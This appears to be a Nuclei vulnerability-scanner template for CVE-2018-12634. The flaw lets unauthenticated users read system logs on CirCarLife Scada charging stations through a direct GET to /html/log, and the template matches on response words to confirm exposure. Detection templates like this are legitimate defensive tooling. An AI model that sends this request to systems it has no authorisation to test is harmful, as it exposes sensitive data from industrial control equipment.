id: CVE-2018-12634 info: name: CirCarLife Scada <4.3 - System Log Exposure author: geeknik severity: critical description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. reference: - https://circontrol.com/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 - https://www.seebug.org/vuldb/ssvid-97353 - https://www.exploit-db.com/exploits/45384/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 tags: cve,cve2018,scada,circontrol,circarlife,logs requests: - method: GET path: - "{{BaseURL}}/html/log" matchers-condition: and matchers: - type: word part: header words: - "CirCarLife Scada" - type: word words: - "user.debug" - "user.info" - "EVSE" condition: and - type: status status: - 200 # Enhanced by mp on 2022/05/12